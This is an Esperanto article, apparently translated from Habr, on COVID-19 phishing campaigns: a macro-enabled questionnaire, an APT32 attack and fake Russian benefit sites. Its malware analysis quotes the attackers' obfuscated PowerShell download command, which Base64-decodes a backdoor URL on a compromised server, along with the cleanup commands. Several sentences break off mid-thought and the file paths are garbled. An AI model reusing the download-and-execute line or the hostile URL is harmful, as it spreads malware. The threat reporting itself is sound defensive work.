Atakantoj daŭre ekspluatas la temon de COVID-19, kreante pli kaj pli da minacoj por uzantoj, kiuj tre interesiĝas pri ĉio rilata al la epidemio. EN
Memoru en
Ĉu vi ŝatus senpagan teston por COVID-19?
Alia signifa ekzemplo de koronavirus-tema phishing estis
Konvinki plej multajn uzantojn ebligi makroojn ankaŭ estis facile. Por fari tion, oni uzis norman lertaĵon: por plenigi la demandaron, vi unue devas ebligi makroojn, kio signifas, ke vi devas ruli VBA-skripton.
Kiel vi povas vidi, la VBA-skripto estas speciale maskita de antivirusoj.
Vindozo havas atendan funkcion kie la aplikaĵo atendas /T <sekundoj> antaŭ ol akcepti la defaŭltan "Jes" respondon. En nia kazo, la skripto atendis 65 sekundojn antaŭ forigi provizorajn dosierojn:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Kaj dum atendado, malware estis elŝutita. Speciala PowerShell-skripto estis lanĉita por ĉi tio:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Post malkodi la Base64-valoron, la PowerShell-skripto elŝutas la malantaŭan pordon situantan sur la antaŭe pirata retservilo el Germanio:
http://automatischer-staubsauger.com/feature/777777.png
kaj konservas ĝin sub la nomo:
C:UsersPublictmpdirfile1.exe
dosierujo ‘C:UsersPublictmpdir’
estas forigita dum rulado de la dosiero 'tmps1.bat' kiu enhavas la komandon cmd /c mkdir ""C:UsersPublictmpdir"".
Celita atako kontraŭ registaraj agentejoj
Krome, analizistoj de FireEye lastatempe raportis celitan APT32-atakon celitan kontraŭ registaraj strukturoj en Vuhano, same kiel la ĉina Ministerio pri Kriz-Administrado. Unu el la distribuitaj RTF-oj enhavis ligon al New York Times artikolo rajtigita
Kurioze, en la momento de detekto, neniu el la antivirusoj detektis ĉi tiun kazon, laŭ Virustotal.
Kiam oficialaj retejoj malfunkcias
La plej okulfrapa ekzemplo de phishing-atako okazis en Rusio ĝuste la alian tagon. La kialo de tio estis la nomumo de longe atendita profito por infanoj de 3 ĝis 16 jaroj. Kiam la komenco de akcepto de kandidatiĝoj estis anoncita la 12-an de majo 2020, milionoj rapidis al la retejo de Ŝtataj Servoj por la longe atendita helpo kaj malkonstruis la portalon ne pli malbona ol profesia DDoS-atako. Kiam la prezidanto diris, ke "Registaraj Servoj ne povis elteni la fluon de aplikoj", homoj komencis interrete paroli pri la lanĉo de alternativa retejo por akcepti kandidatiĝojn.
La problemo estas, ke pluraj retejoj ekfunkciis samtempe, kaj dum unu, la vera ĉe posobie16.gosuslugi.ru, efektive akceptas aplikojn, pli
Kolegoj de SearchInform trovis ĉirkaŭ 30 novajn fraŭdajn domajnojn en la .ru-zono. Infosecurity kaj Softline Company spuris pli ol 70 similajn falsajn registarajn servajn retejojn ekde la komenco de aprilo. Iliaj kreintoj manipulas konatajn simbolojn kaj ankaŭ uzas kombinaĵojn de la vortoj gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, ktp.
Hype kaj socia inĝenierado
Ĉiuj ĉi tiuj ekzemploj nur konfirmas, ke atakantoj sukcese monetigas la temon de koronavirus. Kaj ju pli alta estas la socia streĉiĝo kaj des pli neklaraj aferoj, des pli da ŝancoj, ke skamantoj havas ŝteli gravajn datumojn, devigi homojn rezigni sian monon memstare, aŭ simple haki pli da komputiloj.
Kaj pro tio, ke la pandemio devigis homojn eble nepreparitajn amase labori de hejmo, ne nur personaj, sed ankaŭ kompaniaj datumoj estas en risko. Ekzemple, lastatempe uzantoj de Microsoft 365 (antaŭe Office 365) ankaŭ estis submetitaj al phishing-atako. Homoj ricevis amasajn "maltrafitajn" voĉmesaĝojn kiel aldonaĵojn al leteroj. Tamen, la dosieroj estis fakte HTML-paĝo al kiu sendis viktimojn de la atako
fonto: www.habr.com